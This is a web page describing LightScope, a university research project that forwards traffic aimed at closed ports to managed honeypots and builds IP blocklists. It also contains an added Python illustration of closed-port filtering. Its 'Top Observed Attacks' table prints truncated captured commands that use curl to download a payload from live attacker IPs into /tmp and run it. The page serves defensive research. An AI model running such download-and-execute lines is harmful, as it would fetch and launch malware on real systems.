Free, Open Source, Cybersecurity Research

What is LightScope?

LightScope is a free, open source cybersecurity research initiative that examines unwanted traffic from attackers and scanners. LightScope is different from existing solutions as it turns closed ports on live machines into network telescopes/honeypots, and transparently forwards attacker traffic to USC managed honeypots. This removes the risk of running honeypots on production systems, and makes LightScope difficult for attackers to detect and avoid (unlike traditional honeypots and network telescopes). All this leads to better data for researchers and network operators.

LightScope is only interested in the unwanted traffic that attackers and scanners send you. If you're running a webserver or some other application, LightScope ignores traffic to and from it. We only look at what gets sent to your closed ports, where no legitimate services are running.
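The selection rule described above (ignore traffic to live services, count only hits on closed ports) and the port-scan visibility mentioned further down, as an added illustration that is not LightScope's own code. The listening-port set, the log format and the sample records are constructed assumptions:

```python
# Added illustration (not LightScope's code): apply the page's selection rule,
# "only traffic to closed ports counts", to constructed connection records,
# then flag sources that probe several closed ports as likely scanners.
from collections import defaultdict

# Constructed sample: the ports this host actually serves (assumption).
LISTENING_PORTS = {22, 443}

# Constructed sample log: one inbound connection attempt per line, "src_ip dst_port".
SAMPLE_LOG = """\
203.0.113.5 443
203.0.113.5 443
198.51.100.7 23
198.51.100.7 2323
198.51.100.7 8080
198.51.100.7 5555
192.0.2.9 22
192.0.2.9 3389
"""

def parse_records(text: str) -> list[tuple[str, int]]:
    """Parse 'src_ip dst_port' lines into (ip, port) tuples, skipping malformed lines."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].isdigit():
            continue
        out.append((parts[0], int(parts[1])))
    return out

def unwanted_only(records, listening=LISTENING_PORTS):
    """Keep only hits on closed ports; traffic to real services is ignored entirely."""
    return [(ip, port) for ip, port in records if port not in listening]

def closed_ports_per_source(records, listening=LISTENING_PORTS) -> dict[str, set[int]]:
    """Distinct closed ports touched by each source IP."""
    seen = defaultdict(set)
    for ip, port in unwanted_only(records, listening):
        seen[ip].add(port)
    return dict(seen)

def blocklist_candidates(records, listening=LISTENING_PORTS, min_ports=3) -> list[str]:
    """Sources that probed at least min_ports distinct closed ports (a simple scan heuristic)."""
    per_src = closed_ports_per_source(records, listening)
    return sorted(ip for ip, ports in per_src.items() if len(ports) >= min_ports)

if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    print("closed-port hits:", unwanted_only(recs))
    print("scan candidates:", blocklist_candidates(recs))
```

The client that only ever served port 443 traffic (203.0.113.5) never appears in the output, which is the property the page relies on: production traffic is invisible to the collector.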

LightScope partners with AbuseIPDB and assists them with verifying whether observed scans/attacks are spoofed. This is an important problem, as malicious actors spoof competitors' IPs in order to get them added to blocklists. Prior to LightScope, AbuseIPDB and other services were forced to be conservative and not add IPs they couldn't verify, even if they observed a significant amount of unwanted traffic.

The LightScope client is free, open source, extremely lightweight, and designed to run on production machines. If you install it, you will be provided with rich information about who's targeting your network and tailored IP blocklists you can use to keep your network safe. Please click on one of the images below and select a public endpoint to view the type of data you will receive.

LightScope is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998 and the University of Southern California Information Sciences Institute.


Who's Targeting You?

Support NSF Cybersecurity Research at the University of Southern California, and the Open Source Community!

See who's targeting your systems • Get custom IP blocklists • Help us make the internet safer.

IRB Certified Data Protection
LightScope has passed IRB review verifying our anonymization, collection, and encrypted storage methods (certified exempt) as study UP-25-00124, "LightScope - Survey of unwanted traffic to large user populations", submitted to the University of Southern California Institutional Review Board.

LightScope In Action

The table below illustrates how LightScope assists IP reputation services. As LightScope runs on production endpoints, it observes attacks that other services may miss. Notice how IPs who attack or attempt to log into LightScope endpoints are often misclassified as benign.

[Table populated live on the page; columns: Attacker IP, AbuseIPDB Score, GreyNoise Status, GreyNoise Class, LightScope Blocklist, Interactions]

How LightScope Compares

See how LightScope's unique approach provides advantages over other security tools and services.

LightScope vs GreyNoise
LightScope runs on production hosts instead of dedicated honeypots, providing a different vantage point.

LightScope vs AbuseIPDB & SpamHaus
LightScope blocks IPs faster. We report our findings to these services, but it may take more than our reports to get an IP blocked.

LightScope vs Cisco Talos
LightScope is free, open source, and vendor-neutral - not limited to any one vendor's ecosystem.

LightScope vs Fail2Ban
LightScope analyzes traffic at a lower level with more visibility, detecting things like port scans that Fail2Ban doesn't analyze.

LightScope vs CrowdStrike Falcon
LightScope won't brick your system, as it doesn't need to run as root/admin. It's free, open source, and ultra-lightweight.

LightScope vs SentinelOne Singularity
LightScope won't slow down your system, as it doesn't scan running processes or system memory.

LightScope vs EDR/XDR
LightScope is not EDR/XDR. LightScope gathers information about attackers and produces IP blocklists. Unlike EDR/XDR, it is extremely fast and won't bog down your system inspecting processes or memory. It is designed to work alongside your existing EDR/XDR solutions.

LightScope vs Honeypots
LightScope runs on production systems, which attackers target. Attackers avoid dedicated honeypots, but to attackers LightScope systems appear real (because they are). LightScope is more secure than running your own honeypot, as it transparently forwards attackers to USC managed honeypots.

LightScope vs Network Telescopes
Attackers avoid the dark address space that hosts network telescopes. LightScope works with your in-use IP addresses and live machines. Feel free to use both and get complete network coverage!

Top Observed Attacks

Real attack commands captured by LightScope honeypots running on production systems (command previews are truncated as shown on the page).

Attack Type | Attacker IP | Command Preview
Malware Download & Execute Campaign | 196.251.71.119 | nohup $SHELL -c "curl http://47.236.20.49:60120/linux -o /tmp/haBCRfTf6Z...
Encrypted Payload Deployment | 159.89.105.244 | nohup $SHELL -c "curl http://8.220.245.115:60117/linux -o /tmp/Xqmvb45Dzl...
Multi-Stage Botnet Infection | 204.48.23.8 | nohup $SHELL -c "curl http://47.239.192.107:60140/linux -o /tmp/QNl0GdStgG...


This material is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the U.S. National Science Foundation.

University of Southern California


Information Sciences Institute & Viterbi School of Engineering